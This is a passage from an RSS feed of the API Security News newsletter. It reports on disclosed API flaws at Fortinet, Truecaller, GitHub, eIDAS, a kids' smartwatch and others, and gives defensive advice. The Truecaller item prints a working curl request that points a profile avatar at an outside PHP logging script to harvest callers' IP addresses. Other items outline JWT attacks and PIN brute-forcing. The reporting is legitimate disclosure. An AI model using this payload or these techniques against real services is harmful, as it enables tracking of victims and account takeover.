<p>Positive security (aka whitelisting) is a powerful approach to protecting your APIs against the OWASP API security vulnerabilities <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">A3</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment.htm" target="_blank" rel="noopener noreferrer">A6</a>, and <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm" target="_blank" rel="noopener noreferrer">A8</a>. The webinar will cover what positive security is, why it matters, and how to implement it.</p>
<p>Interested? Click the link to webinar and register to claim your spot.</p>
<p>The post <a href="https://apisecurity.io/issue-60-microsoft-azure-oauth2-vulnerability-5g-threat-landscape/">Issue 60: Microsoft Azure OAuth2 Vulnerability, 5G Threat Landscape, Webinars</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 59: Vulnerabilities in Fortinet, Truecaller, Nykaa Fashion, SMA M2 smartwatch</title>
		<link>https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 Nov 2019 22:00:53 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6461</guid>

					<description><![CDATA[<p>This week is all about API vulnerabilities. We found them everywhere: from client to cloud communications of Fortinet products to avatar hacks in Truecaller app,  an authentication flaw in Nykaa Fashion, and yet another kids smartwatch system with almost total lack of security. Vulnerability: Fortinet Researchers from SEC Consult have found bad implementation in various [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/">Issue 59: Vulnerabilities in Fortinet, Truecaller, Nykaa Fashion, SMA M2 smartwatch</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week is all about API vulnerabilities. We found them everywhere: from client to cloud communications of Fortinet products to avatar hacks in Truecaller app,  an authentication flaw in Nykaa Fashion, and yet another kids smartwatch system with almost total lack of security.</p>
<h2>Vulnerability: Fortinet</h2>
<p>Researchers from <a href="https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/" target="_blank" rel="noopener noreferrer">SEC Consult have found bad implementation in various Fortinet products</a>. Embarrassingly, these were security products, including FortiGuard Web Filter, FortiGuard AntiSpam, and FortiGuard AntiVirus. Turns out that the implementation of communications between their clients and their cloud backend left a lot to be desired.</p>
<p>All of the products rely on UDP and <code>HTTP POST</code> calls to send data from local clients to the cloud service. This data includes, for example:</p>
<ul>
<li>Fortinet serial number</li>
<li>Full URLs in browsing history for FortiGuard Web Filter</li>
<li>Email data for FortiGuard AntiSpam</li>
<li>Unspecified data for FortiGuard AntiVirus</li>
</ul>
<p>For some reason, instead of using standard encryption protocols, the products were simply applying XOR operations on the data. Even worse, they were XORing the data with a hard-coded key. This meant that anyone who had found this key could easily decrypt, read, and modify traffic.</p>
<p>Reinventing the wheel in security is a bad idea. Using established encryption protocols and standards and their off-the-shelf implementation makes your product a lot more secure.</p>
<h2>Vulnerability: Truecaller</h2>
<p>Ehraz Ahmed had a good week with two API vulnerabilities that he had found getting disclosed.</p>
<p>The first one is <a href="https://ehraz.co/security/casestudy/security-flaw-in-truecaller/" target="_blank" rel="noopener noreferrer">a vulnerability in Truecaller</a>. Truecaller is a mobile app that uses crowdsourcing to report caller information. They also have a web application for looking up information on a specific number.</p>
<p>Ahmed found that he could use the Truecaller API to set a URL as the avatar image for numbers. What&#8217;s more, there was no enforcement of a particular domain or pattern for the URL, leaving the door open for malicious links. This allowed him to supply a URL of his PHP script instead of a picture with the following curl (see the <code>avatarUrl</code> part):</p>
<pre><code class="language-http">curl -H 'Host: profile4-noneu.truecaller.com' -H 'accept: */*' -H 'content-type: application/json'
-H 'authorization: Bearer a1i04--GtxQi9FOkBlKqrWwysymvge3xWRT1DdLx5w1DuJ3igycM5_OVL5ClNA_p'
-H 'user-agent: Truecaller/10.23.11 (com.truesoftware.TrueCallerOther; build:10.23.11; iOS 12.4.0; device:iPhone9,3) Alamofire/4.8.0'
-H 'accept-language: en-IN;q=1.0, hi-IN;q=0.9' --data-binary '{"personalData":{"address":{"country":"in","street":"",
"city":"","zipCode":""},"gender":"N","privacy":"Public","avatarUrl":"<strong>https://ehraz.co/null/evil/pwn.php?x=</strong>",
"jobTitle":"","companyName":"","phoneNumbers":[916360366247],"about":"https://ehraz.co/","tags":[],
"onlineIds":{"email":"","url":"https://ehraz.co/"}},"lastName":"Wong","firstName":"Sum Ting"}'
--compressed 'https://profile4-noneu.truecaller.com/v4/profile?'</code></pre>
<p>Once this was done, he could start calling his victims from that number. If the victim opened the profile of the number, the Truecaller client tried to retrieve the avatar as well. This would trigger the PHP script to log information about the invoker (the victim), including the IP address and client operating system (Android, iOS) and its version.</p>
<h2>Vulnerability: Nykaa Fashion</h2>
<p>The other vulnerability that Ahmed found was with a popular Indian beauty and fashion retailer, Nykaa Fashion. With the customer base of about a million, the potential impact of the vulnerability would have been considerable.</p>
<p>Unfortunately, the <a href="https://tech.economictimes.indiatimes.com/news/internet/nykaa-fashion-fixes-security-flaw-which-risked-customer-details/72098514" target="_blank" rel="noopener noreferrer">details of the actual vulnerability are scant</a>. Looks like this had something to do with authentication:</p>
<blockquote><p>“One of their Internal APIs can log you into any Nykaa Fashion account, bypassing your Email Address into the request, and in response, it returns with the Access Token [&#8230;]</p>
<p>Hackers and Telemarketers can mine the data&#8230;(of approximately a million users) by automating a script using a phone number dump found online”</p></blockquote>
<p>Our advice is to use standard authentication protocols and their off-the-shelf implementations. For administrative access, use roles and groups, and ensure that any administrative functions have authorization checks in place.</p>
<h2>Vulnerability: SMA M2 Kids Smartwatch</h2>
<p>Unfortunately, API vulnerabilities in children&#8217;s GPS smartwatches are extremely common. We have already covered some of them in our issues <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/" target="_blank" rel="noopener noreferrer">7</a>, <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener noreferrer">18</a>, <a href="https://apisecurity.io/issue-19-half-amazon-top-selling-smart-devices-found-vulnerable/" target="_blank" rel="noopener noreferrer">19</a>, and <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/" target="_blank" rel="noopener noreferrer">26</a>.</p>
<p>This week, the IoT laboratory of the AV-TEST Institute has found <a href="https://www.iot-tests.org/2019/11/product-warning-chinese-childrens-watch-reveals-thousands-of-childrens-data/" target="_blank" rel="noopener noreferrer">glaring security holes in the APIs of SMA-WATCH-M2 kid&#8217;s smartwatch</a>, manufactured by the Chinese company Shenzhen Smart Care Technology Ltd.</p>
<p>As with other similar products, parents control the watch with a smartphone app and a cloud service. Communications go through REST APIs over public internet.</p>
<p>The following API security issues were reported:</p>
<ul>
<li>Although the API requires authentication tokens, the tokens are actually not verified — so the API is effectively wide open.</li>
<li>The API uses IDs that can be enumerated. Thus, a successful brute force attack would find all devices in use.</li>
</ul>
<p>As the result, researchers found more that 5 000 smartwatches in use. They could:</p>
<ul>
<li>Find all information that parents had entered in the profile (names, addresses, pictures, phone numbers&#8230;)</li>
<li>Get the current GPS coordinates of the device</li>
<li>Perform actions, such as calling or messaging the device</li>
</ul>
<p>Scary stuff. We can only agree with the researchers that a device like this puts children in danger instead of protecting them.</p>
<p>The post <a href="https://apisecurity.io/issue-59-vulnerabilities-in-fortinet-truecaller-nykaa-sma-m2-smartwatch/">Issue 59: Vulnerabilities in Fortinet, Truecaller, Nykaa Fashion, SMA M2 smartwatch</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 58: Broken Object Level Authorization explained, plus practical tips on API security</title>
		<link>https://apisecurity.io/issue-58-broken-object-level-authorization-explained-plus-practical-tips-on-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 Nov 2019 22:00:37 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6450</guid>

					<description><![CDATA[<p>This week, we continue to look at the upcoming OWASP API Security Top 10, discuss organizational changes that can make organizations more cybersecure, check out another security checklist, and upcoming API security conferences. API vulnerability explained: Broken Object Level Authorization Broken Object Level Authorization (BOLA, aka IDOR) holds the #1 spot in the  OWASP API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-58-broken-object-level-authorization-explained-plus-practical-tips-on-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-58-broken-object-level-authorization-explained-plus-practical-tips-on-api-security/">Issue 58: Broken Object Level Authorization explained, plus practical tips on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we continue to look at the upcoming OWASP API Security Top 10, discuss organizational changes that can make organizations more cybersecure, check out another security checklist, and upcoming API security conferences.</p>
<h2>API vulnerability explained: Broken Object Level Authorization</h2>
<p>Broken Object Level Authorization (BOLA, aka IDOR) holds the #1 spot in the  OWASP API Security Top 10 as the most common and most severe API vulnerability.</p>
<p><a href="https://medium.com/@inonst/a-deep-dive-on-the-most-critical-api-vulnerability-bola-1342224ec3f2" target="_blank" rel="noopener noreferrer">Inon Shkedy has written a brilliant post</a> explaining what BOLA is, how attackers can locate and exploit it, and how to prevent it from hitting your APIs. For added convenience, the article is split into sections geared towards different user roles: managers, engineers, builders, and breakers &#8211; so you can home in the things that are close to your heart. Highly recommended to take a closer look.</p>
<p>By the way, if you have not yet registered for the live OWASP API Security Top 10 webinar later today, you still have a few hours to do so! Click <a href="https://42crunch.com/webinar-owasp-api-top-10/" target="_blank" rel="noopener noreferrer">here</a> to find more information and to register.</p>
<h2>Organizations: Structuring your team for security</h2>
<p>The German direct bank <a href="https://medium.com/insiden26/n26-security-3-0-81a4e85c5fe8" target="_blank" rel="noopener noreferrer">N26 has published a story on how they have changed their organization</a>, their work culture, and their tools after an API vulnerability in 2016.</p>
<p>They offer insights on concrete acts on roles, teams, processes, and tools to improve security.</p>
<p>Organizational challenges to cybersecurity:</p>
<ul>
<li>Security culture
<ul>
<li>Security champions</li>
<li>Threat modeling</li>
<li>Work with the community</li>
</ul>
</li>
<li>Building security into products
<ul>
<li>Web security</li>
<li>Backend security</li>
<li>Security engineering</li>
</ul>
</li>
<li>Scaling security with organizational growth
<ul>
<li>Product security</li>
<li>Infrastructure security</li>
<li>Security risk management</li>
<li>Trust and safety</li>
</ul>
</li>
</ul>
<p>This is a high level article. However, it can be very useful for anyone struggling to build security culture in your own organization or how to go about it.</p>
<h2>Tools: Security checklist for web developers</h2>
<p><a href="https://appsecure.security/blog/security-checklist-for-web-developers" target="_blank" rel="noopener noreferrer">Ameya Darshan has compiled a Security Checklist for Web Developers</a> that is very applicable for API security as well.</p>
<p>The list provides lots of great advice on input validation, authentication, transport, headers, and so forth.</p>
<p>Definitely worth checking out and keeping at hand when working on APIs.</p>
<h2>Events: API security conference calendar</h2>
<p>APISecurity.io now has an <a href="https://apisecurity.io/events/" target="_blank" rel="noopener noreferrer">events section</a>:  a calendar of upcoming conferences related to API security world wide.</p>
<p><a href="https://apisecurity.io/events/"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6457" src="https://apisecurity.io/wp-content/uploads/2019/11/API-Security-Conference-Calendar.jpg" alt="API Security Conference Calendar" width="684" height="380" /></a></p>
<p>If you find that we have missed any events missing, <a href="https://apisecurity.io/contact-us/">do let us know</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-58-broken-object-level-authorization-explained-plus-practical-tips-on-api-security/">Issue 58: Broken Object Level Authorization explained, plus practical tips on API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 57: Vulnerabilities at Facebook, Amazon Ring, and GitHub, OWASP API Security Top 10 Webinar</title>
		<link>https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 13 Nov 2019 22:00:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6439</guid>

					<description><![CDATA[<p>This week we look at the recent API vulnerabilities at Facebook, Amazon Ring, and GitHub. There is also an upcoming webinar on OWASP API Security Top 10 that you can attend. Vulnerability: Facebook Facebook has reported and fixed a vulnerability in their Groups API. This API and the information it exposes had been potentially abused [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/">Issue 57: Vulnerabilities at Facebook, Amazon Ring, and GitHub, OWASP API Security Top 10 Webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we look at the recent API vulnerabilities at Facebook, Amazon Ring, and GitHub. There is also an upcoming webinar on OWASP API Security Top 10 that you can attend.</p>
<h2>Vulnerability: Facebook</h2>
<p>Facebook has <a href="https://developers.facebook.com/blog/post/2019/11/05/changes-groups-api-access/" target="_blank" rel="noopener noreferrer">reported and fixed a vulnerability in their Groups API</a>. This API and the information it exposes had been potentially abused by about 100 partners after Facebook introduced stricter conditions.</p>
<p>The vulnerability allowed apps to access and download excessive data including user names and profile pictures of the group members without their permission.</p>
<p>This is a reminder on a few important API security best practices:</p>
<ul>
<li>Object-level authorization to make sure that APIs cannot access the data that they should not access</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring.htm">Logging and monitoring</a> so you can detect when the data indeed is downloaded and can go back and see who accessed which data</li>
</ul>
<h2>Vulnerability: Amazon Ring</h2>
<p>Researchers at Bitdefender <a href="https://www.bitdefender.com/files/News/CaseStudies/study/294/Bitdefender-WhitePaper-RDoor-CREA3949-en-EN-GenericUse.pdf">have found a vulnerability</a> in Amazon Ring doorbell cameras.</p>
<p>During initial setup, the doorbell starts an unsecured WiFi access point and communicates over unencrypted HTTP with the mobile app. Thus, it could leak data, including your home WiFi password that in turn could open the door for accessing everything else in your home network.</p>
<p>Even worse, the danger won&#8217;t pass after the setup is done. An attacker could trigger the reconfiguration of the doorbell by continuously sending deauthentication messages so that the doorbell gets dropped from the wireless network. This forces the owner to reset the doorbell and thus leak the WiFi credentials, with the attacker at the ready to take advantage.</p>
<p>Do not ever use unencrypted connections, even for short period of times! HTTPS and TLS are there for a reason. And do not sacrifice security for user convenience. Careful design can help you achieve both.</p>
<h2>Vulnerability: GitHub OAuth Flow</h2>
<p>Teddy Katz successfully <a href="https://blog.teddykatz.com/2019/11/05/github-oauth-bypass.html" target="_blank" rel="noopener noreferrer">hacked GitHub&#8217;s OAuth flow using a HEAD request</a>:</p>
<ol>
<li>GitHub implementation was using the same URL (<code>https://github.com/login/oauth/authorize</code>) for both authentication web page (with <code>GET</code> requests) and OAuth request submissions (with <code>POST</code>). There was code in place to differentiate between the two and handle them accordingly.</li>
<li>To circumvent the logic, attacker had to send a <code>HEAD</code> request. Typically, these are used instead of <code>GET</code> to receive headers only &#8211; for example to determine the size of response without actually downloading it.</li>
<li>The Rails router in GitHub treats <code>HEAD</code> requests as <code>GET</code> and forwards the request to the controller. This is automated behavior by Rails that developers didn&#8217;t account for.</li>
<li>The if-else logic of the controller only expects <code>GET</code>  requests (to render authentication web page) or <code>POST</code> requests (for the actual authentication). Since the <code>HEAD</code> request is not a <code>GET</code>, the controller handles it as a <code>POST</code>, int other words as authentication.</li>
<li>Because a <code>HEAD</code> request lacks the CSRF protection, the access to the GitHub data is granted without user consent.</li>
</ol>
<p>An important reminder why it is important to properly define all accepted operations in your API and enforce them.</p>
<h2>Webinar: OWASP API Security Top 10</h2>
<p>Want to learn more about the upcoming OWASP API Security Top 10? Next Thursday, November 21, I will be participating in a webinar with some real life examples of recent vulnerabilities from each of the OWASP API Security Top 10 categories.</p>
<p>To claim your spot, register <a href="https://42crunch.com/webinar-owasp-api-top-10/" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/">Issue 57: Vulnerabilities at Facebook, Amazon Ring, and GitHub, OWASP API Security Top 10 Webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 56: Common JWT Attacks, OWASP API Security Top 10 cheat sheet</title>
		<link>https://apisecurity.io/issue-56-common-jwt-attacks-owasp-api-security-top-10-cheatsheet/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Nov 2019 22:00:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6422</guid>

					<description><![CDATA[<p>This week, API vulnerabilities were reported in Rittal cooling systems. In other news, there is an API vulnerability cheat sheet that you can print and put on your wall, an overview of common JWT attacks, and a GlobalData report on the trends in API management and API security. Vulnerability: Rittal industrial cooling Applied Risk has [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-56-common-jwt-attacks-owasp-api-security-top-10-cheatsheet/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-56-common-jwt-attacks-owasp-api-security-top-10-cheatsheet/">Issue 56: Common JWT Attacks, OWASP API Security Top 10 cheat sheet</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, API vulnerabilities were reported in Rittal cooling systems. In other news, there is an API vulnerability cheat sheet that you can print and put on your wall, an overview of common JWT attacks, and a GlobalData report on the trends in API management and API security.</p>
<h2>Vulnerability: Rittal industrial cooling</h2>
<p><a href="https://applied-risk.com/resources/ar-2019-015" target="_blank" rel="noopener noreferrer">Applied Risk has found two critical vulnerabilities in Rittal industrial cooling equipment</a>. If attackers know the URLs to invoke, they can bypass authentication and turn cooling on or off  or set the temperature.</p>
<p>From the description, it is hard to figure out whether this is  <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>  or  <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization.</a></p>
<p>The second vulnerability is not any better: the system also has hard-coded credentials.</p>
<p>IoT remains a big source of API vulnerability news. Vendors in that space are often used to caring more about the physical side of the product and not paying enough attention to the security of the software and services components.</p>
<h2>OWASP API Security Top 10 cheat sheet</h2>
<p>We have covered the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10</a> project in the past. This is a community effort (currently in the Release Candidate phase) to document the most frequent vulnerabilities in web APIs.</p>
<p>To make it easier for you to keep these in mind, we have created a cheat sheet that you can print and put on your wall.</p>
<p>The graphics and short descriptions make navigating the categories easier, and there&#8217;s also advice on how to mitigate the risks.</p>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10-cheat-sheet.htm"><img loading="lazy" decoding="async" class="aligncenter" src="https://apisecurity.io/encyclopedia/images/owasp/cheat_sheet_thumbnail.jpg" alt="OWASP API Security Top 10 Vulnerabilities Cheat Sheet" width="212" height="392" /></a></p>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10-cheat-sheet.htm" target="_blank" rel="noopener noreferrer">Download the OWASP API Security Top 10 cheat sheet here</a>.</p>
<h2>Hacking JSON Web Tokens (JWT)</h2>
<p>JSON Web Tokens (JWT) are one of the most frequently used methods to pass caller information with REST API calls.</p>
<p>Unfortunately, it is also frequently misused and misunderstood. Hackers can take advantage of that to launch successful attacks on your APIs.</p>
<p><a href="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" target="_blank" rel="noopener noreferrer">Vickie Li has just published</a> a good quick overview of JWT and the most frequent vulnerabilities in its use.</p>
<p>The most common JWT attacks are:</p>
<ul>
<li>Algorithm manipulation
<ul>
<li>Using <code>None</code> as the algorithm</li>
<li>Using symmetric encryption (HMAC) instead of asymmetric RSA</li>
</ul>
</li>
<li>Lack of signature validation</li>
<li>Bruteforcing weak secret keys</li>
<li>Secret keys leaking through another attack (like directory traversal, XXE, or SSRF)</li>
<li>Key ID (KID) manipulation
<ul>
<li>Directory traversals</li>
<li>SQL injections</li>
<li>Command injections</li>
</ul>
</li>
<li>JKU/JWK/x5u/x5c headers used sending rogue keys</li>
<li>Information leaks in JWT when developers forget that <code>base64</code> encoding is not encrypting</li>
</ul>
<h2>Analysts: GlobalData</h2>
<p>Charlotte Dunlap from GlobalData has published a new report <a href="https://itcblogs.currentanalysis.com/2019/10/21/api-world-2019-api-security-tops-api-management-priorities/" target="_blank" rel="noopener noreferrer">&#8220;API Security tops API Management&#8221;</a>. The highlights from the report include:</p>
<ul>
<li>A new API lifecycle management approach is founded on emerging security innovations (AI, DevSecOps, API Security by design).</li>
<li>Pure-play API security providers threaten to outshine API management leaders through the best-of-breed security.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-56-common-jwt-attacks-owasp-api-security-top-10-cheatsheet/">Issue 56: Common JWT Attacks, OWASP API Security Top 10 cheat sheet</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 55: Vulnerabilities in eIDAS and Cisco routers, Instagram API program locked down</title>
		<link>https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 30 Oct 2019 22:00:43 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6386</guid>

					<description><![CDATA[<p>This week, we check out the vulnerabilities fixed in EU&#8217;s eIDAS (electronic IDentification, Authentication, and trust Services) system and Cisco routers, how Instagram is seeking to avoid the privacy controversies that Facebook itself has had, and interesting predictions from Gartner&#8217;s latest API report. Vulnerability: EU eIDAS EU has patched the reference implementation of the eIDAS [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/">Issue 55: Vulnerabilities in eIDAS and Cisco routers, Instagram API program locked down</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the vulnerabilities fixed in EU&#8217;s eIDAS (electronic IDentification, Authentication, and trust Services) system and Cisco routers, how Instagram is seeking to avoid the privacy controversies that Facebook itself has had, and interesting predictions from Gartner&#8217;s latest API report.</p>
<h2>Vulnerability: EU eIDAS</h2>
<p>EU has patched the reference implementation of the eIDAS system that the member states use for international transactions and signatures.</p>
<p><a href="https://www.bleepingcomputer.com/news/security/europes-electronic-id-system-fixed-against-impersonation-risk/" target="_blank" rel="noopener noreferrer">Sec Consul found a flaw in certificate checks</a> that allowed anyone to forge their identity in the system. The certificate signatures of SAML responses were validated by simply matching the Distinguished Name (DN) of the certificate with the local trust store, not the public key of the issuer certificate. If attackers crafted a SAML response where the certificate DN matched one in trusted certificates, they could authenticate as anyone.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium" src="https://www.bleepstatic.com/images/news/u/1100723/eidas_message.png" width="504" height="470" /></p>
<p>This is not the first time improper certificate verification is leading to a vulnerability. TwitterKit SDK <a href="https://apisecurity.io/issue-53-vulnerabilities-in-twitterkit-justdial-voi-e-scooters/">had one just a few weeks ago</a>. The best advice here would probably be to not reinvent the wheel and use popular established libraries and products.</p>
<h2>Vulnerability: Cisco Routers</h2>
<p><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass" target="_blank" rel="noopener noreferrer">Cisco has fixed the REST API module for its routers</a> running Cisco IOS XE software. An improper check in the REST API authentication could allow an unauthenticated access to the device.</p>
<p>Attackers could craft a malicious HTTP request and send it to the authentication service. This could cause the service to return the <code>token-id</code> of another, authenticated user that the attackers could then use to execute privileged actions through the REST API.</p>
<p>Unfortunately, Cisco did not provide further details, so it is hard to have specific lessons learned derived from the case.</p>
<h2>API program changes: Instagram</h2>
<p><a href="https://www.cbronline.com/news/instagram-api" target="_blank" rel="noopener noreferrer">Instagram is locking down its API</a> as is moves to use the Facebook Graph API. To give users better transparency and control over their data, Instagram:</p>
<ul>
<li>Removes location from API data</li>
<li>Separates profile and media access</li>
<li>Gives users an UI where they can review all apps that have API access and set access levels for them</li>
</ul>
<p>This is an interesting case of the vendor cleaning up an existing API to remove the data exposure not required by the business (and thus partly mitigating <a class="MCXref xref" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">OWASP API3:2019 — Excessive data exposure</a>), retrospectively adding scopes for granular data access, and making API access visible and controllable by the end users.</p>
<p>Something that many other vendors can learn from.</p>
<h2>Analyst Forecast: Gartner</h2>
<p>Gartner has published their report <a href="https://www.gartner.com/en/documents/3970520" target="_blank" rel="noopener noreferrer">&#8220;API Strategy Maturity Model&#8221;</a>. Among other interesting things, the analysts Mark O&#8217;Neill and Saniye Alaybeyi lay out the following noteworthy statistics:</p>
<ul>
<li>By 2021, exposed APIs will form a larger surface area for attacks than the UI in 90% of web-enabled applications. The increase will be significant from 40% in 2019.</li>
<li>By 2023, over 50% of B2B transactions will be performed through real-time APIs versus traditional approaches.</li>
</ul>
<p>Both the numbers highlight the increased importance of API security for businesses as the technology changes.</p>
<p>The post <a href="https://apisecurity.io/issue-55-vulnerabilities-eidas-cisco-routers-instagram-api-program-locked/">Issue 55: Vulnerabilities in eIDAS and Cisco routers, Instagram API program locked down</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 54: API vulnerabilities in eRosary, Kubernetes, Harbor</title>
		<link>https://apisecurity.io/issue-54-api-vulnerabilities-in-erosary-kubernetes-harbor/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Oct 2019 22:00:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6368</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in smart prayer beads, Kubernetes, and Harbor, as well as analogies between API security and airport security. Vulnerability: ClickToPray eRosary Vatican has released ClickToPray eRosary, the smart rosary beads that — naturally — come with the accompanying mobile app. Unfortunately, the app had a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-54-api-vulnerabilities-in-erosary-kubernetes-harbor/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-54-api-vulnerabilities-in-erosary-kubernetes-harbor/">Issue 54: API vulnerabilities in eRosary, Kubernetes, Harbor</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in smart prayer beads, Kubernetes, and Harbor, as well as analogies between API security and airport security.</p>
<h2>Vulnerability: ClickToPray eRosary</h2>
<p>Vatican has released ClickToPray eRosary, the smart rosary beads that — naturally — come with the accompanying mobile app. Unfortunately, the app had <a href="https://fidusinfosec.com/clicktopray-erosary-account-takeover/" target="_blank" rel="noopener noreferrer">a couple of API vulnerabilities that allow full account takeover</a>.</p>
<p>Alongside login with Google or Facebook account, the third login option the app developers chose was just to ask for the email address of the user and send a 4-digit PIN to the supplied address. The user could then log in to the app with the received PIN code. However, the API powering the email login had two flaws:</p>
<ol>
<li>The first one could be classified as <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">OWASP API3: Excessive Data Exposure</a>. The <code>POST</code> request to submit the email address to request the PIN actually included the generated PIN code <em>in</em> the API response:Sample request:
<p><img loading="lazy" decoding="async" class=" aligncenter" src="https://fidusinfosec.com/wp-content/uploads/2019/10/PIN-Post-Request-JSON.png" width="473" height="194" /></p>
<p>Sample response:<br />
<img loading="lazy" decoding="async" class="aligncenter " src="https://fidusinfosec.com/wp-content/uploads/2019/10/PIN-Response-JSON.png" width="241" height="106" /><br />
This meant that attackers didn&#8217;t need to access the victim&#8217;s mailbox to get their hands on the PIN. They could simply make the <code>POST</code> call with the victim&#8217;s email address, retrieve the PIN from the API response, and log in to the app with it.</li>
<li>The second vulnerability was <a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm" target="_blank" rel="noopener noreferrer">API4: Lack of Resources and Rate Limiting</a>.While the mobile app did not allow more than one login attempt in every 60 seconds, the API did not have any limitation. A simple script iterating over all possible 4-digit PIN numbers would allow attackers simply to brute-force their way in.</li>
</ol>
